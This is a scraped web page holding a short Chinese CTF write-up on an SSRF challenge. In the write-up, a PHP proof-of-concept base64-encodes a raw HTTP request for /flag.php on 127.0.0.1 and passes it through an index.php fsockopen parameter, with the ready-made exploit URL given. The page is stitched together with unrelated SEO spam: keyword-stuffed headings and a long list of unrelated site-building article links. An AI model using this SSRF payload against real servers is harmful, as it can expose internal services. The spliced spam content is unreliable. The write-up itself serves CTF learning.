当前位置: 首页 > news >正文

山西建设厅网站2016年3号文件企业网站建设视频教程

山西建设厅网站2016年3号文件,企业网站建设视频教程,宁波专业建网站外包,移动端使用wordpress富文本这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察 本题是需要我们去伪造一个ssrf的请求头去绕过 题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 bas…

这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察

本题是需要我们去伪造一个ssrf的请求头去绕过

题目开始给了我们信息让我们去访问index.php

fsockopen函数触发ssrf

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。

通过了解知道fsockopen函数就要清楚有考察ssrf的意思,需要往这个方向去想

之后就是利用poc构建脚本

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80

之后就是构建url

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

用base64加密然后构建url编码

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

http://www.yayakq.cn/news/373020/

相关文章:

  • wordpress建站欣赏长春网上建设网站
  • 网站建设客户确认单wordpress 随机重复
  • 做网站用需要几个软件仿淘宝php c2c电子商务网站模板
  • access 数据库做网站成都网站logo设计
  • 狮山网站建设网站建设与管理实训心得
  • 做设计网站模块的网站中国建设银行网站用户是什么
  • 丽水市城乡建设局网站e福州app
  • 怎么给网站做seo优化招商加盟网站系统
  • 六安seo地址上海网上推广优化
  • 中国建设银行江西分行网站首页电商网站建设网络公司
  • 培训机构网站建设推广天元建设集团有限公司官网
  • 网站域名解析登陆网站建设中 html
  • 做qq代刷网站河源网站建设1993seo
  • 计算机网站建设及管理如何推销网站建设
  • 平潭县机场建设网站塑料模板多少钱一平方
  • 如何选择网站目标关键词易代理ip官网
  • 海南网站建设设计简单网页设计模板html
  • 垫江集团网站建设做免费的网站教程
  • 外贸型网站推广与监测seo服务商技术好的公司
  • 重庆网站建设吧管局备案网站
  • 用mediawiki做的网站ip会变怎么做网站
  • 西安网站制作顶尖哈尔滨搜索引擎建站
  • 万盛经开区规划建设局网站服务 好的网站制作
  • 中文单页面网站模板免费下载企业文化有哪些
  • 网站建设有什么好处西地那非片有延时效果吗
  • 网页开发用什么软件百度seo点击工具
  • 上海购物网站建设软件开发公司名字大全
  • 长治网站制作公司三网合一网站怎么做
  • 要学做网站wordpress条文件夹
  • 做家教网站怎么样郑州做网站锐